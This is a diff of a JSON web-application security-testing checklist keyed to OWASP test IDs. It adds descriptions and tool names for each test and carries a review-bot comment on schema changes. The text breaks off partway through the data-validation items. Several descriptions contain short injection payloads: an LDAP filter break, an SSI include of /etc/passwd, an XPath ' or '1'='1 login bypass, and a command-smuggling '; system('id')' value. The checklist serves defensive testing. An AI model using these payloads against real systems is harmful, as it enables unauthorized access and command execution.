bmt 0.1.1 → 0.4.0

@@ -11,59 +11,80 @@
11
11
  "key": "information",
12
12
  "title": "Information gathering",
13
13
  "description": "",
14
+ "type": "checklist",
14
15
  "items": [
15
16
  {
16
17
  "key": "search_engine_discovery_and_reconnaissance",
17
18
  "title": "Conduct Search Engine Discovery and Reconnaissance for Information Leakage",
18
- "description": "OTG-INFO-001, WAHHM - Recon and Analysis",
19
+ "caption": "OTG-INFO-001, WAHHM - Recon and Analysis",
20
+ "description": "Use a search engine to search for Network diagrams and Configurations, Credentials, Error message content.",
21
+ "tools": "Google Hacking, Sitedigger, Shodan, FOCA, Punkspider",
19
22
  "vrt_category": "sensitive_data_exposure"
20
23
  },
21
24
  {
22
25
  "key": "fingerprint",
23
26
  "title": "Fingerprint Web Server",
24
- "description": "OTG-INFO-002, WAHHM - Recon and Analysis",
27
+ "caption": "OTG-INFO-002, WAHHM - Recon and Analysis",
28
+ "description": "Find the version and type of a running web server to determine known vulnerabilities and the appropriate exploits. Using 'HTTP header field ordering' and 'Malformed requests test.'",
29
+ "tools": "Httprint, Httprecon, Desenmascarame",
25
30
  "vrt_category": "server_security_misconfiguration"
26
31
  },
27
32
  {
28
33
  "key": "webserver_metafiles",
29
34
  "title": "Review Webserver Metafiles for Information Leakage",
30
- "description": "OTG-INFO-003, WAHHM - Recon and Analysis"
35
+ "caption": "OTG-INFO-003, WAHHM - Recon and Analysis",
36
+ "description": "Analyze robots.txt and identify <META> Tags from website.",
37
+ "tools": "Browser, curl, wget"
31
38
  },
32
39
  {
33
40
  "key": "enumerate_applications",
34
41
  "title": "Enumerate Applications on Webserver",
35
- "description": "if in scope OTG-INFO-004, WAHHM - Recon and Analysis"
42
+ "caption": "if in scope OTG-INFO-004, WAHHM - Recon and Analysis",
43
+ "description": "Find applications hosted in the webserver (Virtual hosts/Subdomain), non-standard ports, DNS zone transfers",
44
+ "tools": "Webhosting.info, dnsrecon, Nmap, fierce, Recon-ng, Intrigue"
36
45
  },
37
46
  {
38
47
  "key": "webpage_comments_and_metadata",
39
48
  "title": "Review Webpage Comments and Metadata for Information Leakage",
40
- "description": "OTG-INFO-005, WAHHM - Recon and Analysis",
49
+ "caption": "OTG-INFO-005, WAHHM - Recon and Analysis",
50
+ "description": "Find sensitive information from webpage comments and Metadata on source code.",
51
+ "tools": "Browser, curl, wget",
41
52
  "vrt_category": "sensitive_data_exposure"
42
53
  },
43
54
  {
44
55
  "key": "application_entry_points",
45
56
  "title": "Identify application entry points",
46
- "description": "OTG-INFO-006, WAHHM - Recon and Analysis"
57
+ "caption": "OTG-INFO-006, WAHHM - Recon and Analysis",
58
+ "description": "Identify from hidden fields, parameters, methods HTTP header analysis",
59
+ "tools": "Burp proxy, ZAP, Tamper data"
47
60
  },
48
61
  {
49
62
  "key": "execution_paths",
50
63
  "title": "Map execution paths through application",
51
- "description": "OTG-INFO-007, WAHHM - Recon and Analysis"
64
+ "caption": "OTG-INFO-007, WAHHM - Recon and Analysis",
65
+ "description": "Map the target application and understand the principal workflows.",
66
+ "tools": "Burp proxy, ZAP"
52
67
  },
53
68
  {
54
69
  "key": "fingerprint_webapp_framework",
55
70
  "title": "Fingerprint Web Application Framework",
56
- "description": "OTG-INFO-008, WAHHM - Recon and Analysis"
71
+ "caption": "OTG-INFO-008, WAHHM - Recon and Analysis",
72
+ "description": "Find the type of web application framework/CMS from HTTP headers, Cookies, Source code, Specific files and folders.",
73
+ "tools": "Whatweb, BlindElephant, Wappalyzer"
57
74
  },
58
75
  {
59
76
  "key": "fingerprint_webapp",
60
77
  "title": "Fingerprint Web Application",
61
- "description": "OTG-INFO-009, WAHHM - Recon and Analysis"
78
+ "caption": "OTG-INFO-009, WAHHM - Recon and Analysis",
79
+ "description": "Identify the web application and version to determine known vulnerabilities and the appropriate exploits.",
80
+ "tools": "Whatweb, BlindElephant, Wappalyzer"
62
81
  },
63
82
  {
64
83
  "key": "application_architecture",
65
84
  "title": "Map Application Architecture",
66
- "description": "OTG-INFO-010, WAHHM - Recon and Analysis"
85
+ "caption": "OTG-INFO-010, WAHHM - Recon and Analysis",
86
+ "description": "Identify application architecture including Web language, WAF, Reverse proxy, Application Server, Backend Database",
87
+ "tools": "Browser, curl, wget"
67
88
  }
68
89
  ]
69
90
  },
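Review bot: The new `tools` field introduced in this hunk stores a list as one comma-separated string (`"tools": "Google Hacking, Sitedigger, Shodan, FOCA, Punkspider"`), so every consumer has to split and trim it itself, and values such as `"Burp Proxy (Authorize), ZAP"` in the authorization hunk make that split ambiguous once a tool name carries its own punctuation. A JSON array, `"tools": ["Google Hacking", "Sitedigger", "Shodan", "FOCA", "Punkspider"]`, is the natural shape here and keeps `tools` a single type in every item; the same applies to every other hunk in this diff, from `config_and_deploy_management` through `cryptography`. The existing `description` key also changes meaning in this hunk: the OTG reference it used to hold moves to the new `caption` key and `description` now carries prose, so any consumer that rendered `description` as the OTG identifier will silently display different text. That looks like the breaking schema change behind the 0.1.1 → 0.4.0 bump and deserves an explicit line in the package's changelog or README naming the `description` → `caption` move and the new `tools` and `type` keys.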
@@ -71,52 +92,69 @@
71
92
  "key": "config_and_deploy_management",
72
93
  "title": "Configuration and Deploy Management Testing",
73
94
  "description": "",
95
+ "type": "checklist",
74
96
  "items": [
75
97
  {
76
98
  "key": "network_and_infrastructure",
77
99
  "title": "Test Network/Infrastructure Configuration",
78
- "description": "OTG-CONFIG-001, WAHHM - Recon and Analysis, Assess Application Hosting",
100
+ "caption": "OTG-CONFIG-001, WAHHM - Recon and Analysis, Assess Application Hosting",
101
+ "description": "Understand the infrastructure elements interactions, config management for software, backend DB server, WebDAV, FTP in order to identify known vulnerabilities.",
102
+ "tools": "Nessus",
79
103
  "vrt_category": "server_security_misconfiguration"
80
104
  },
81
105
  {
82
106
  "key": "application_platform",
83
107
  "title": "Test Application Platform Configuration",
84
- "description": "OTG-CONFIG-002, WAHHM - Recon and Analysis",
108
+ "caption": "OTG-CONFIG-002, WAHHM - Recon and Analysis",
109
+ "description": "Identify default installation file/directory, Handle Server errors (40*,50*), Minimal Privilege, Software logging.",
110
+ "tools": "Browser, Nikto",
85
111
  "vrt_category": "server_security_misconfiguration"
86
112
  },
87
113
  {
88
114
  "key": "file_extensions_handling",
89
115
  "title": "Test File Extensions Handling for Sensitive Information",
90
- "description": "OTG-CONFIG-003, WAHHM - Recon and Analysis",
116
+ "caption": "OTG-CONFIG-003, WAHHM - Recon and Analysis",
117
+ "description": "Find important file, information (.asa , .inc , .sql ,zip, tar, pdf, txt, etc)",
118
+ "tools": "Browser, Nikto",
91
119
  "vrt_category": "sensitive_data_exposure"
92
120
  },
93
121
  {
94
122
  "key": "backup_and_unreferenced_files",
95
123
  "title": "Backup and Unreferenced Files for Sensitive Information",
96
- "description": "OTG-CONFIG-004, WAHHM - Recon and Analysis",
124
+ "caption": "OTG-CONFIG-004, WAHHM - Recon and Analysis",
125
+ "description": "Check JS source code, comments, cache file, backup file (.old, .bak, .inc, .src) and guessing of filename",
126
+ "tools": "Nessus, Nikto, Wikto",
97
127
  "vrt_category": "sensitive_data_exposure"
98
128
  },
99
129
  {
100
130
  "key": "admin_interfaces",
101
131
  "title": "Enumerate Infrastructure and Application Admin Interfaces",
102
- "description": "OTG-CONFIG-005, WAHHM - Recon and Analysis"
132
+ "caption": "OTG-CONFIG-005, WAHHM - Recon and Analysis",
133
+ "description": "Directory and file enumeration, comments and links in source (/admin, /administrator, /backoffice, /backend, etc), alternative server port (Tomcat/8080)",
134
+ "tools": "Burp Proxy, dirb, Dirbuster, fuzzdb, Tilde Scanner"
103
135
  },
104
136
  {
105
137
  "key": "http_methods",
106
138
  "title": "Test HTTP Methods",
107
- "description": "OTG-CONFIG-006, WAHHM - Test Handling of Access",
139
+ "caption": "OTG-CONFIG-006, WAHHM - Test Handling of Access",
140
+ "description": "Identify HTTP allowed methods on Web server with OPTIONS. Arbitrary HTTP Methods, HEAD access control bypass and XST",
141
+ "tools": "netcat, curl",
108
142
  "vrt_category": "server_security_misconfiguration"
109
143
  },
110
144
  {
111
145
  "key": "http_transport_security",
112
146
  "title": "Test HTTP Strict Transport Security",
113
- "description": "OTG-CONFIG-007, WAHHM - Test Handling of Access",
147
+ "caption": "OTG-CONFIG-007, WAHHM - Test Handling of Access",
148
+ "description": "Identify HSTS header on Web server through HTTP response header. curl -s -D- https://domain.com/ | grep Strict",
149
+ "tools": "Burp Proxy, ZAP, curl",
114
150
  "vrt_category": "server_security_misconfiguration"
115
151
  },
116
152
  {
117
153
  "key": "ria_cross_domain_policy",
118
154
  "title": "Test RIA cross domain policy",
119
- "description": "OTG-CONFIG-008, WAHHM - Test Handling of Access",
155
+ "caption": "OTG-CONFIG-008, WAHHM - Test Handling of Access",
156
+ "description": "Analyse the permissions allowed from the policy files (crossdomain.xml/clientaccesspolicy.xml) and allow-access-from.",
157
+ "tools": "Burp Proxy, ZAP, Nikto",
120
158
  "vrt_category": "server_security_misconfiguration"
121
159
  }
122
160
  ]
@@ -125,46 +163,61 @@
125
163
  "key": "identity_management",
126
164
  "title": "Identity Management Testing",
127
165
  "description": "",
166
+ "type": "checklist",
128
167
  "items": [
129
168
  {
130
169
  "key": "role_definition",
131
170
  "title": "Test Role Definitions",
132
- "description": "OTG-IDENT-001, WAHHM - Test Handling of Access",
171
+ "caption": "OTG-IDENT-001, WAHHM - Test Handling of Access",
172
+ "description": "Validate the system roles defined within the application by creating a permission matrix.",
173
+ "tools": "Burp Proxy, ZAP",
133
174
  "vrt_category": "broken_access_control"
134
175
  },
135
176
  {
136
177
  "key": "user_registration",
137
178
  "title": "Test User Registration Process",
138
- "description": "OTG-IDENT-002, WAHHM - Test Handling of Access",
179
+ "caption": "OTG-IDENT-002, WAHHM - Test Handling of Access",
180
+ "description": "Verify that the identity requirements for user registration are aligned with business and security requirements",
181
+ "tools": "Burp Proxy, ZAP",
139
182
  "vrt_category": "server_security_misconfiguration"
140
183
  },
141
184
  {
142
185
  "key": "account_provisioning",
143
186
  "title": "Test Account Provisioning Process",
144
- "description": "OTG-IDENT-003, WAHHM - Test Handling of Access"
187
+ "caption": "OTG-IDENT-003, WAHHM - Test Handling of Access",
188
+ "description": "Determine which roles are able to provision users and what sort of accounts they can provision.",
189
+ "tools": "Burp Proxy, ZAP"
145
190
  },
146
191
  {
147
192
  "key": "guessable_user_accounts",
148
193
  "title": "Testing for Account Enumeration and Guessable User Account",
149
- "description": "OTG-IDENT-004, WAHHM - Test Handling of Access",
194
+ "caption": "OTG-IDENT-004, WAHHM - Test Handling of Access",
195
+ "description": "Generic login error statement check, return codes/parameter values, enumerate all possible valid user ids (Login system, Forgot password)",
196
+ "tools": "Browser, Burp Proxy, ZAP",
150
197
  "vrt_category": "server_security_misconfiguration"
151
198
  },
152
199
  {
153
200
  "key": "username_policy",
154
201
  "title": "Testing for Weak or unenforced username policy",
155
- "description": "OTG-IDENT-005, WAHHM - Test Handling of Access",
202
+ "caption": "OTG-IDENT-005, WAHHM - Test Handling of Access",
203
+ "description": "User account names are often highly structured (e.g. Joe Bloggs account name is jbloggs and Fred Nurks account name is fnurks) and valid account names can easily be guessed.",
204
+ "tools": "Browser, Burp Proxy, ZAP",
156
205
  "vrt_category": "server_security_misconfiguration"
157
206
  },
158
207
  {
159
208
  "key": "guest_accounts_permission",
160
209
  "title": "Test Permissions of Guest/Training Accounts",
161
- "description": "OTG-IDENT-006, WAHHM - Test Handling of Access",
210
+ "caption": "OTG-IDENT-006, WAHHM - Test Handling of Access",
211
+ "description": "Guest and Training accounts are useful ways to acquaint potential users with system functionality prior to them completing the authorization process required for access. Evaluate consistency between access policy and guest/training account access permissions.",
212
+ "tools": "Burp Proxy, ZAP",
162
213
  "vrt_category": "server_security_misconfiguration"
163
214
  },
164
215
  {
165
216
  "key": "account_suspension_resumption",
166
217
  "title": "Test Account Suspension/Resumption Process",
167
- "description": "OTG-IDENT-007, WAHHM - Test Handling of Access",
218
+ "caption": "OTG-IDENT-007, WAHHM - Test Handling of Access",
219
+ "description": "Verify the identity requirements for user registration align with business/security requirements. Validate the registration process.",
220
+ "tools": "Burp Proxy, ZAP",
168
221
  "vrt_category": "server_security_misconfiguration"
169
222
  }
170
223
  ]
@@ -173,65 +226,86 @@
173
226
  "key": "authentication",
174
227
  "title": "Authentication Testing",
175
228
  "description": "",
229
+ "type": "checklist",
176
230
  "items": [
177
231
  {
178
232
  "key": "encrypted_credentials",
179
233
  "title": "Testing for Credentials Transported over an Encrypted Channel",
180
- "description": "OTG-AUTHN-001, WAHHM - Miscellaneous Tests",
234
+ "caption": "OTG-AUTHN-001, WAHHM - Miscellaneous Tests",
235
+ "description": "Check the referrer whether it’s HTTP or HTTPs. Sending data through HTTP and HTTPS.",
236
+ "tools": "Burp Proxy, ZAP",
181
237
  "vrt_category": "broken_authentication_and_session_management"
182
238
  },
183
239
  {
184
240
  "key": "default_credentials",
185
241
  "title": "Testing for default credentials",
186
- "description": "OTG-AUTHN-002, WAHHM - Test Handling of Access",
242
+ "caption": "OTG-AUTHN-002, WAHHM - Test Handling of Access",
243
+ "description": "Testing for default credentials of common applications, Testing for default password of new accounts.",
244
+ "tools": "Burp Proxy, ZAP, Hydra",
187
245
  "vrt_category": "server_security_misconfiguration"
188
246
  },
189
247
  {
190
248
  "key": "lock_out_mechanism",
191
249
  "title": "Testing for Weak lock out mechanism",
192
- "description": "OTG-AUTHN-003, WAHHM - Test Handling of Access",
250
+ "caption": "OTG-AUTHN-003, WAHHM - Test Handling of Access",
251
+ "description": "Evaluate the account lockout mechanism’s ability to mitigate brute force password guessing. Evaluate the unlock mechanism’s resistance to unauthorized account unlocking.",
252
+ "tools": "Browser",
193
253
  "vrt_category": "server_security_misconfiguration"
194
254
  },
195
255
  {
196
256
  "key": "bypass_schema",
197
257
  "title": "Testing for bypassing authentication schema",
198
- "description": "OTG-AUTHN-004, WAHHM - Test Handling of Access",
258
+ "caption": "OTG-AUTHN-004, WAHHM - Test Handling of Access",
259
+ "description": "Force browsing (/admin/main.php, /page.asp?authenticated=yes), Parameter Modification, Session ID prediction, SQL Injection",
260
+ "tools": "Burp Proxy, ZAP",
199
261
  "vrt_category": "broken_authentication_and_session_management"
200
262
  },
201
263
  {
202
264
  "key": "remember_password",
203
265
  "title": "Test remember password functionality",
204
- "description": "OTG-AUTHN-005, WAHHM - Test Handling of Access",
266
+ "caption": "OTG-AUTHN-005, WAHHM - Test Handling of Access",
267
+ "description": "Look for passwords being stored in a cookie. Examine the cookies stored by the application. Verify that the credentials are not stored in clear text, but are hashed. Autocompleted=off?",
268
+ "tools": "Burp Proxy, ZAP",
205
269
  "vrt_category": "broken_authentication_and_session_management"
206
270
  },
207
271
  {
208
272
  "key": "browser_cache",
209
273
  "title": "Testing for Browser cache weakness",
210
- "description": "OTG-AUTHN-006, WAHHM - Miscellaneous Tests",
274
+ "caption": "OTG-AUTHN-006, WAHHM - Miscellaneous Tests",
275
+ "description": "Check browser history issues by clicking the 'Back' button after logging out. Check browser cache issue from HTTP response headers (Cache-Control: no-cache)",
276
+ "tools": "Burp Proxy, ZAP, Firefox add-on CacheViewer2",
211
277
  "vrt_category": "server_security_misconfiguration"
212
278
  },
213
279
  {
214
280
  "key": "password_policy",
215
281
  "title": "Testing for Weak password policy",
216
- "description": "OTG-AUTHN-007, WAHHM - Test Handling of Access",
282
+ "caption": "OTG-AUTHN-007, WAHHM - Test Handling of Access",
283
+ "description": "Determine the resistance of the application against brute force password guessing using available password dictionaries by evaluating the length, complexity, reuse and aging requirements of Passwords.",
284
+ "tools": "Burp Proxy, ZAP, Hydra",
217
285
  "vrt_category": "insufficient_security_configurability"
218
286
  },
219
287
  {
220
288
  "key": "security_question",
221
289
  "title": "Testing for Weak security question/answer",
222
- "description": "OTG-AUTHN-008, WAHHM - Test Handling of Access",
290
+ "caption": "OTG-AUTHN-008, WAHHM - Test Handling of Access",
291
+ "description": "Testing for weak pre-generated questions, Testing for weak self-generated questions, Testing for brute-forcible answers (Unlimited attempts?)",
292
+ "tools": "Browser",
223
293
  "vrt_category": "broken_authentication_and_session_management"
224
294
  },
225
295
  {
226
296
  "key": "change_password",
227
297
  "title": "Testing for weak password change or reset functionalities",
228
- "description": "OTG-AUTHN-009, WAHHM - Test Handling of Access",
298
+ "caption": "OTG-AUTHN-009, WAHHM - Test Handling of Access",
299
+ "description": "Test password reset (Display old password in plain-text?, Send via email?, Random token on confirmation email ?), Test password change (Need old password?), CSRF vulnerability ?",
300
+ "tools": "Browser, Burp Proxy, ZAP",
229
301
  "vrt_category": "broken_authentication_and_session_management"
230
302
  },
231
303
  {
232
304
  "key": "alternative_channel",
233
305
  "title": "Testing for Weaker authentication in alternative channel",
234
- "description": "OTG-AUTHN-010, WAHHM - Test Handling of Access"
306
+ "caption": "OTG-AUTHN-010, WAHHM - Test Handling of Access",
307
+ "description": "Understand the primary mechanism and Identify other channels (Mobile App, Call center, SSO)",
308
+ "tools": "Browser"
235
309
  }
236
310
  ]
237
311
  },
@@ -239,29 +313,38 @@
239
313
  "key": "authorization",
240
314
  "title": "Authorization Testing",
241
315
  "description": "",
316
+ "type": "checklist",
242
317
  "items": [
243
318
  {
244
319
  "key": "directory_traversal_and_file_include",
245
320
  "title": "Testing Directory traversal/file include",
246
- "description": "OTG-AUTHZ-001, WAHHM - Test Handling of Input",
321
+ "caption": "OTG-AUTHZ-001, WAHHM - Test Handling of Input",
322
+ "description": "dot-dot-slash attack (../), Directory traversal, Local File inclusion/Remote File Inclusion.",
323
+ "tools": "Burp Proxy, ZAP, Wfuzz",
247
324
  "vrt_category": "server_side_injection"
248
325
  },
249
326
  {
250
327
  "key": "bypass_schema",
251
328
  "title": "Testing for bypassing authorization schema",
252
- "description": "OTG-AUTHZ-002, WAHHM - Test Handling of Access",
329
+ "caption": "OTG-AUTHZ-002, WAHHM - Test Handling of Access",
330
+ "description": "Access a resource without authentication?, Bypass ACL, Force browsing (/admin/adduser.jsp)",
331
+ "tools": "Burp Proxy (Authorize), ZAP",
253
332
  "vrt_category": "broken_access_control"
254
333
  },
255
334
  {
256
335
  "key": "privilege_escalation",
257
336
  "title": "Testing for Privilege Escalation",
258
- "description": "OTG-AUTHZ-003, WAHHM - Test Handling of Access",
337
+ "caption": "OTG-AUTHZ-003, WAHHM - Test Handling of Access",
338
+ "description": "Testing for role/privilege manipulates the values of hidden variables. Change some param groupid=2 to groupid=1",
339
+ "tools": "Burp Proxy (Authorize), ZAP",
259
340
  "vrt_category": "broken_authentication_and_session_management"
260
341
  },
261
342
  {
262
343
  "key": "direct_object_reference",
263
344
  "title": "Testing for Insecure Direct Object References",
264
- "description": "OTG-AUTHZ-004, WAHHM - Test Handling of Access",
345
+ "caption": "OTG-AUTHZ-004, WAHHM - Test Handling of Access",
346
+ "description": "Force changing parameter value (?invoice=123 -> ?invoice=456)",
347
+ "tools": "Burp Proxy (Authorize), ZAP",
265
348
  "vrt_category": "broken_access_control"
266
349
  }
267
350
  ]
@@ -270,53 +353,70 @@
270
353
  "key": "session_management",
271
354
  "title": "Session Management Testing",
272
355
  "description": "",
356
+ "type": "checklist",
273
357
  "items": [
274
358
  {
275
359
  "key": "bypass_schema",
276
360
  "title": "Testing for Bypassing Session Management Schema",
277
- "description": "OTG-SESS-001, WAHHM - Test Handling of Access",
361
+ "caption": "OTG-SESS-001, WAHHM - Test Handling of Access",
362
+ "description": "SessionID analysis prediction, unencrypted cookie transport, brute-force.",
363
+ "tools": "Burp Proxy, ForceSSL, ZAP, CookieDigger",
278
364
  "vrt_category": "broken_authentication_and_session_management"
279
365
  },
280
366
  {
281
367
  "key": "cookies",
282
368
  "title": "Testing for Cookies attributes",
283
- "description": "OTG-SESS-002, WAHHM - Test Handling of Access",
369
+ "caption": "OTG-SESS-002, WAHHM - Test Handling of Access",
370
+ "description": "Check HTTPOnly and Secure flag expiration, inspect for sensitive data.",
371
+ "tools": "Burp Proxy, ZAP",
284
372
  "vrt_category": "server_security_misconfiguration"
285
373
  },
286
374
  {
287
375
  "key": "fixation",
288
376
  "title": "Testing for Session Fixation",
289
- "description": "OTG-SESS-003, WAHHM - Test Handling of Access",
377
+ "caption": "OTG-SESS-003, WAHHM - Test Handling of Access",
378
+ "description": "The application doesn't renew the cookie after a successful user authentication.",
379
+ "tools": "Burp Proxy, ZAP",
290
380
  "vrt_category": "broken_authentication_and_session_management"
291
381
  },
292
382
  {
293
383
  "key": "exposed_variables",
294
384
  "title": "Testing for Exposed Session Variables",
295
- "description": "OTG-SESS-004, WAHHM - Test Handling of Access",
385
+ "caption": "OTG-SESS-004, WAHHM - Test Handling of Access",
386
+ "description": "Encryption & Reuse of session Tokens vulnerabilities, Send sessionID with GET method ?",
387
+ "tools": "Burp Proxy, ZAP",
296
388
  "vrt_category": "broken_authentication_and_session_management"
297
389
  },
298
390
  {
299
391
  "key": "csrf",
300
392
  "title": "Testing for Cross Site Request Forgery",
301
- "description": "OTG-SESS-005, WAHHM - Test Handling of Access",
393
+ "caption": "OTG-SESS-005, WAHHM - Test Handling of Access",
394
+ "description": "URL analysis, Direct access to functions without any token.",
395
+ "tools": "Burp Proxy (csrf_token_detect), burpy, ZAP",
302
396
  "vrt_category": "cross_site_request_forgery_csrf"
303
397
  },
304
398
  {
305
399
  "key": "logout",
306
400
  "title": "Testing for logout functionality",
307
- "description": "OTG-SESS-006, WAHHM - Test Handling of Access",
401
+ "caption": "OTG-SESS-006, WAHHM - Test Handling of Access",
402
+ "description": "Check reuse session after logout both server-side and SSO.",
403
+ "tools": "Burp Proxy, ZAP",
308
404
  "vrt_category": "broken_authentication_and_session_management"
309
405
  },
310
406
  {
311
407
  "key": "timeout",
312
408
  "title": "Test Session Timeout",
313
- "description": "OTG-SESS-007, WAHHM - Test Handling of Access",
409
+ "caption": "OTG-SESS-007, WAHHM - Test Handling of Access",
410
+ "description": "Check session timeout, after the timeout has passed, all session tokens should be destroyed or be unusable.",
411
+ "tools": "Burp Proxy, ZAP",
314
412
  "vrt_category": "broken_authentication_and_session_management"
315
413
  },
316
414
  {
317
415
  "key": "puzzling",
318
416
  "title": "Testing for Session puzzling",
319
- "description": "OTG-SESS-008, WAHHM - Test Handling of Access",
417
+ "caption": "OTG-SESS-008, WAHHM - Test Handling of Access",
418
+ "description": "The application uses the same session variable for more than one purpose. An attacker can potentially access pages in an order unanticipated by the developers so that the session variable is set in one context and then used in another.",
419
+ "tools": "Burp Proxy, ZAP",
320
420
  "vrt_category": "broken_authentication_and_session_management"
321
421
  }
322
422
  ]
@@ -325,155 +425,210 @@
325
425
  "key": "data_validation",
326
426
  "title": "Data Validation Testing",
327
427
  "description": "",
428
+ "type": "checklist",
328
429
  "items": [
329
430
  {
330
431
  "key": "reflected_xss",
331
432
  "title": "Testing for Reflected Cross Site Scripting",
332
- "description": "OTG-INPVAL-001, WAHHM - Test Handling of Input"
433
+ "caption": "OTG-INPVAL-001, WAHHM - Test Handling of Input",
434
+ "description": "Check for input validation, Replace the vector used to identify XSS, XSS with HTTP Parameter Pollution.",
435
+ "tools": "Burp Proxy, ZAP, Xenotix XSS"
333
436
  },
334
437
  {
335
438
  "key": "stored_xss",
336
439
  "title": "Testing for Stored Cross Site Scripting",
337
- "description": "OTG-INPVAL-002, WAHHM - Test Handling of Input",
440
+ "caption": "OTG-INPVAL-002, WAHHM - Test Handling of Input",
441
+ "description": "Check input forms/Upload forms and analyze HTML codes, Leverage XSS with BeEF",
442
+ "tools": "Burp Proxy, ZAP, BeEF, XSS Proxy",
338
443
  "vrt_category": "cross_site_scripting_xss"
339
444
  },
340
445
  {
341
446
  "key": "http_verb_tampering",
342
447
  "title": "Testing for HTTP Verb Tampering",
343
- "description": "OTG-INPVAL-003, WAHHM - Test Handling of Input",
448
+ "caption": "OTG-INPVAL-003, WAHHM - Test Handling of Input",
449
+ "description": "Craft custom HTTP requests to test the other methods to bypass URL authentication and authorization.",
450
+ "tools": "netcat",
344
451
  "vrt_category": "server_security_misconfiguration"
345
452
  },
346
453
  {
347
454
  "key": "http_param_pollution",
348
455
  "title": "Testing for HTTP Parameter pollution",
349
- "description": "OTG-INPVAL-004, WAHHM - Test Handling of Input",
456
+ "caption": "OTG-INPVAL-004, WAHHM - Test Handling of Input",
457
+ "description": "Identify any form or action that allows user-supplied input to bypass Input validation and filters using HPP",
458
+ "tools": "ZAP, HPP Finder (Chrome Plugin)",
350
459
  "vrt_category": "server_side_injection"
351
460
  },
352
461
  {
353
462
  "key": "sql_injection",
354
463
  "title": "Testing for SQL Injection",
355
- "description": "OTG-INPVAL-005, WAHHM - Test Handling of Input",
464
+ "caption": "OTG-INPVAL-005, WAHHM - Test Handling of Input",
465
+ "description": "Union, Boolean, Error based, Out-of-band, Time delay.",
466
+ "tools": "Burp Proxy (SQLipy), SQLMap, Pangolin, Seclists (FuzzDB)",
356
467
  "vrt_category": "server_side_injection"
357
468
  },
358
469
  {
359
470
  "key": "oracle",
360
471
  "title": "Oracle Testing",
361
- "description": ""
472
+ "caption": "",
473
+ "description": "Identify URLs for PL/SQL web applications, Access with PL/SQL Packages, Bypass PL/SQL Exclusion list, SQL Injection",
474
+ "tools": "Orascan, SQLInjector"
362
475
  },
363
476
  {
364
477
  "key": "mysql",
365
478
  "title": "MySQL Testing",
366
- "description": ""
479
+ "caption": "",
480
+ "description": "Identify MySQL version, Single quote, Information_schema, Read/Write file.",
481
+ "tools": "SQLMap, Mysqloit, Power Injector"
367
482
  },
368
483
  {
369
484
  "key": "sql_server",
370
485
  "title": "SQL Server Testing",
371
- "description": ""
486
+ "caption": "",
487
+ "description": "Comment operator (- -), Query separator (;), Stored procedures (xp_cmdshell)",
488
+ "tools": "SQLMap, SQLninja, Power Injector"
372
489
  },
373
490
  {
374
491
  "key": "postgre_sql",
375
492
  "title": "Testing PostgreSQL",
376
- "description": ""
493
+ "caption": "",
494
+ "description": "Determine that the backend database engine is PostgreSQL by using the :: cast operator. Read/Write file, Shell Injection (OS command)",
495
+ "tools": "SQLMap"
377
496
  },
378
497
  {
379
498
  "key": "ms_access",
380
499
  "title": "MS Access Testing",
381
- "description": ""
500
+ "caption": "",
501
+ "description": "Enumerate the column through error-based (Group by), Obtain database schema combine with fuzzdb.",
502
+ "tools": "SQLMap"
382
503
  },
383
504
  {
384
505
  "key": "nosql_injection",
385
506
  "title": "Testing for NoSQL injection",
386
- "description": ""
507
+ "caption": "",
508
+ "description": "dentify NoSQL databases, Pass special characters (' \" \\ ; { } ), Attack with reserved variable name, operator.",
509
+ "tools": "NoSQLMap"
387
510
  },
388
511
  {
389
512
  "key": "ldap_injection",
390
513
  "title": "Testing for LDAP Injection",
391
- "description": "OTG-INPVAL-006, WAHHM - Test Handling of Input",
514
+ "caption": "OTG-INPVAL-006, WAHHM - Test Handling of Input",
515
+ "description": "/ldapsearch?user=*user=*user=*)(uid=*))(|(uid=*pass=password",
516
+ "tools": "Burp Proxy, ZAP",
392
517
  "vrt_category": "server_side_injection"
393
518
  },
394
519
  {
395
520
  "key": "orm_injection",
396
521
  "title": "Testing for ORM Injection",
397
- "description": "OTG-INPVAL-007, WAHHM - Test Handling of Input",
522
+ "caption": "OTG-INPVAL-007, WAHHM - Test Handling of Input",
523
+ "description": "Testing ORM injection is identical to SQL injection testing",
524
+ "tools": "Hibernate, Nhibernate",
398
525
  "vrt_category": "server_side_injection"
399
526
  },
400
527
  {
401
528
  "key": "xml_injection",
402
529
  "title": "Testing for XML Injection",
403
- "description": "OTG-INPVAL-008, WAHHM - Test Handling of Input",
530
+ "caption": "OTG-INPVAL-008, WAHHM - Test Handling of Input",
531
+ "description": "Check with XML Meta Characters', \" , <>, <!--/-->, &, <![CDATA[ / ]]>, XXE, TAG",
532
+ "tools": "Burp Proxy, ZAP, Wfuzz",
404
533
  "vrt_category": "server_side_injection"
405
534
  },
406
535
  {
407
536
  "key": "ssi_injection",
408
537
  "title": "Testing for SSI Injection",
409
- "description": "OTG-INPVAL-009, WAHHM - Test Handling of Input",
538
+ "caption": "OTG-INPVAL-009, WAHHM - Test Handling of Input",
539
+ "description": "Presence of .shtml extension, Check for these characters, < ! # = / . \" - > and [a-zA-Z0-9], include String = <!--#include virtual='/etc/passwd'",
540
+ "tools": "Burp Proxy, ZAP",
410
541
  "vrt_category": "server_side_injection"
411
542
  },
412
543
  {
413
544
  "key": "xpath_injection",
414
545
  "title": "Testing for XPath Injection",
415
- "description": "OTG-INPVAL-010, WAHHM - Test Handling of Input",
546
+ "caption": "OTG-INPVAL-010, WAHHM - Test Handling of Input",
547
+ "description": "Check for XML error enumeration by supplying a single quote (').\nUsername: ‘ or ‘1’ = ‘1\nPassword: ‘ or ‘1’ = ‘1",
548
+ "tools": "Burp Proxy, ZAP",
416
549
  "vrt_category": "server_side_injection"
417
550
  },
418
551
  {
419
552
  "key": "imap_smtp_injection",
420
553
  "title": "IMAP/SMTP Injection",
421
- "description": "OTG-INPVAL-011, WAHHM - Test Handling of Input",
554
+ "caption": "OTG-INPVAL-011, WAHHM - Test Handling of Input",
555
+ "description": "Identifying vulnerable parameters with special characters (i.e.: \\, ‘, “, @, #, !, |).\nUnderstanding the data flow and deployment structure of the client\nIMAP/SMTP command injection (Header, Body, Footer)",
556
+ "tools": "Burp Proxy, ZAP",
422
557
  "vrt_category": "server_side_injection"
423
558
  },
424
559
  {
425
560
  "key": "code_injection",
426
561
  "title": "Testing for Code Injection",
427
- "description": "OTG-INPVAL-012, WAHHM - Test Handling of Input",
562
+ "caption": "OTG-INPVAL-012, WAHHM - Test Handling of Input",
563
+ "description": "Enter OS commands in the input field.?arg=1; system('id')",
564
+ "tools": "Burp Proxy, ZAP, Liffy, Panoptic",
428
565
  "vrt_category": "server_side_injection"
429
566
  },
430
567
  {
431
568
